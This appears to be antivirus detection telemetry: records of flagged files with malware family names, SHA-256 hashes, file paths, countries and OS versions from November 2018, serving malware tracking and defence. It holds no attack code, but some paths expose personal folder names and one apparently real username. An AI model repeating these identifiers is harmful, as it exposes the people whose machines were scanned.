  Row(detection=Row(filename='pierino.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\PIERINO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:09:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tsmuxer.exe', filepath='C:\\Program Files (x86)\\FormatFactory\\FFModules\\Encoder\\tsMuxer.exe', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='9f64f3b7f684d5557efbc40aa949b0dbf9dbccc36b662e5cc5b2fdc00058f20f', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=45056, timestamp='2018-11-01T17:31:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\f3a1auwacbd\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:59:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00023878', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00023878', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:40:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00024379', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00024379', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:47:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0002443e', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0002443e', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:51:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/BitCoinMiner.oqcoo.#M1.#R1'), hash='38daa3a7a6eb99c7caffe23ce14a0c2959aa770c4515e9e048b9eef025ab9cb2', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:24:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131947-3df92572', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131947-3DF92572', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:19:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-232250-c1c05ea1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_35c1ccdc\\AVSCAN-20181103-232239-BFB53107\\AVSCAN-20181103-232250-C1C05EA1', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:22:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-161901-db2a1fc0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-161901-DB2A1FC0', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:19:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cpp.exe', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\fluent\\ntbin\\win64\\cpp.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='18ac69750e5cfc3f7cf1a42e7c197d738810364bbe4e6a13d3c5518b2a6814e2', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-04T15:11:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130829-0ac5979b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130829-0AC5979B', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:08:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-104112-bc527a1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_63e443d6\\AVSCAN-20181104-100059-6C0185B6\\AVSCAN-20181104-104112-BC527A1B', filesize=896000, name='ADWARE/CrossRider.Gen2.#M1.#R1'), hash='043263a827d1399a6a67c283c2dae406a399f7e976a95c897b20a5d70cefcd06', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:41:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000240ed', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000240ed', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:44:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-004556-44859beb', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_4ee48232\\AVSCAN-20181105-004059-10B33BF4\\AVSCAN-20181105-004556-44859BEB', filesize=640000, name='PUA/LoadMoney.#M1.#R1'), hash='627c97051bd4898bd39d4d70cd0a106a5a67ac64e0a8d108cf2e4b177c28966e', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:45:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-145227-20c93e5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_516e7232\\AVSCAN-20181104-144104-D168248E\\AVSCAN-20181104-145227-20C93E5C', filesize=64000, name='TR/Offend.6983021.2.#M1.#R1'), hash='0f5529a785f44d09d9d9dae60892caf7b2851b2f1e05b342621060a03eeb0c3b', metadata=Row(cmdline=None, country='YE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:52:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='7 кл3.exe', filepath='f:\\файлы скрыты трояном\\ашык сабак 7\\7 кл3.exe', filesize=1856000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='6b298e7f955006a6752235e607901ff40406355f50e95e7edbddd28b14e88ff9', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:31:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:00:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-033055-c2b3eb7e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_26e38ada\\AVSCAN-20181104-032923-AF3970DA\\AVSCAN-20181104-033055-C2B3EB7E', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T05:31:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a834b4c48f7e57e704d0aa9f60025c4ece1f33b220eb347d4a57a2e81a34d3e1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\A834B4C48F7E57E704D0AA9F60025C4ECE1F33B220EB347D4A57A2E81A34D3E1', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='a834b4c48f7e57e704d0aa9f60025c4ece1f33b220eb347d4a57a2e81a34d3e1', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T10:57:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\TEMP\\tmp7490146\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:54:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:57:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T23:58:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='epson321833eu.exe', filepath='D:\\c\\Mes documents\\downloads\\Programs\\epson321833eu.exe', filesize=13376000, name='W32/Sality.AG.#M1.#R1'), hash='a8fe30c84e9ac4cc4577ef29103bb69db4e3cf4245388b295b09f69d89574c45', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T10:51:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-232025-01e203fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24ba8b03\\AVSCAN-20181104-232004-FD3D2909\\AVSCAN-20181104-232025-01E203FE', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='9d68807cc4ef56758891c335832bdc903d14ba45201fb94f172317d71d8c776e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:20:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0003420.exe', filepath='f:\\system volume information\\_restore{c479216e-5d38-4428-b4db-e28930c85d49}\\rp8\\A0003420.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='4c449dd83890f87f4ad8d5fe8eeb44165013e2f9dd0098954de0d44b3828ab5d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:29:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:20:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:14:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dxac601.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\dxaC600.tmp\\dxaC601.tmp', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:11:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-092347-dc642c8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1683e6be\\AVSCAN-20181104-090613-498D57A5\\AVSCAN-20181104-092347-DC642C8B', filesize=640000, name='TR/AD.Nymaim.Y.#M1.#R1'), hash='5308c357f63aeed4a0ac407a08378dc3fda18f6fe4482731507c4b075c49fdc6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:23:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='1_17_10_1.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_17_10_1.html', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='08d164ebfdbcc78ab2c200eb4891cf0db7544613c808f469e32641cd689e99ae', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T08:55:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215927-88014f79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa78dab4\\AVSCAN-20181104-215047-4793A06D\\AVSCAN-20181104-215927-88014F79', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T23:59:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:27:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T13:34:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-104700-532c9983', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_99abb338\\AVSCAN-20181104-104630-4F83BD84\\AVSCAN-20181104-104700-532C9983', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T09:47:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124539-c25bb862', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_949c51c9\\AVSCAN-20181104-114243-D1379150\\AVSCAN-20181104-124539-C25BB862', filesize=1336000, name='PUA/InstallCore.#M1.#R1'), hash='4ba0876fef0855708223e1ccd6ba78e35e0cb264716caf88703ab50aec1935bb', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:45:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a57ad8f6d1c0e5112d307c282ea0763fa12e8fecb6aa64a7ba26d64df767e2b7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\A57AD8F6D1C0E5112D307C282EA0763FA12E8FECB6AA64A7BA26D64DF767E2B7', filesize=680000, name='TR/Dropper.Gen.#M300.#R246'), hash='a57ad8f6d1c0e5112d307c282ea0763fa12e8fecb6aa64a7ba26d64df767e2b7', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T10:18:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='radbc86d.tmp.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\radbc86d.tmp.exe', filesize=192000, name='TR/Crypt.ZPACK.71063b.#M1.#R1'), hash='71063b91d8872098c2d6942af8d9e0d0d1346da19cb73a09110edac7295db7c1', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\cmd.exe', parentsize=302592, timestamp='2018-11-04T17:30:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153442-bd97d7a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-153442-BD97D7A4', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5642847f2a431c9c5852b1e5ebe606f11acd628c251cc8d30f75beadc612518d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:34:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mell.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Curtails\\mell.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='48b3294ebedde43151ade7342018800be31175d8f8f9b1fb075258e0ef1f65bb', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:52:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='\\\\?\\C:\\Program Files\\InstallShield Installation Information\\{3C3F9CEB-2C5A-4A47-8EAA-DA76037546BA}\\setup.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='6586b0bf89e96f0c24a9a041ac10e950ca53a4d472db3b46f72299b614c4a973', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:16:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-173727-614243ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-173727-614243AB', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5642847f2a431c9c5852b1e5ebe606f11acd628c251cc8d30f75beadc612518d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:37:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='رحلة الثلج.exe', filepath='d:\\هبه\\رحلة الثلج\\رحلة الثلج.exe', filesize=11264000, name='W32/Sality.AT.#M1.#R1'), hash='b9409d8e1b382236ea21942e235f81e32c22d45c0c136872420d9cba90f239d8', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:56:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015d42a', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015d42a', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:42:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:56:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204222-27b0384a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_21d84954\\AVSCAN-20181104-203904-1290D8EE\\AVSCAN-20181104-204222-27B0384A', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:42:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T01:16:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='brmfcmon.exe', filepath='F:\\Program Files\\Brother\\Brmfcmon\\BrMfcMon.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='32b0d34ab16a2d7df472e6d2dd1895000221fcb97e6d645cbbf34ddae7f28197', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T11:32:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{3C3F9CEB-2C5A-4A47-8EAA-DA76037546BA}\\setup.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='6586b0bf89e96f0c24a9a041ac10e950ca53a4d472db3b46f72299b614c4a973', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\VS Revo Group\\Revo Uninstaller\\RevoUnin.exe', parentsize=12572448, timestamp='2018-11-04T03:15:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='d031cfa448e58af0abffb17aed9c01c080bbbf3073d552d19fb6d8778163e684', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T03:23:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T09:58:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2015年各类先进统计表l.xls', filepath='D:\\共享文件\\历史\\我的ww - 副本\\2014\\2014年各类先进申报表\\2014先进统计\\2015年各类先进统计表l.xls', filesize=128000, name='HEUR/Macro.Downloader.ZAP.Gen.#M1.#R1'), hash='933cdc4a2bf53541639eed7628eeb1d71557361c02e4fb4269dd7049cd4ec6fe', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T01:23:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221509-5c0f2bb0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221509-5C0F2BB0', filesize=64000, name='TR/Agent.64000.116.#M1.#R1'), hash='78fda789cdedfc745466d5fecd1dc02f6320d517cd7c10742964338d3e79d4a9', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:07Z'), dt=datetime.date(2018, 11, 2)),
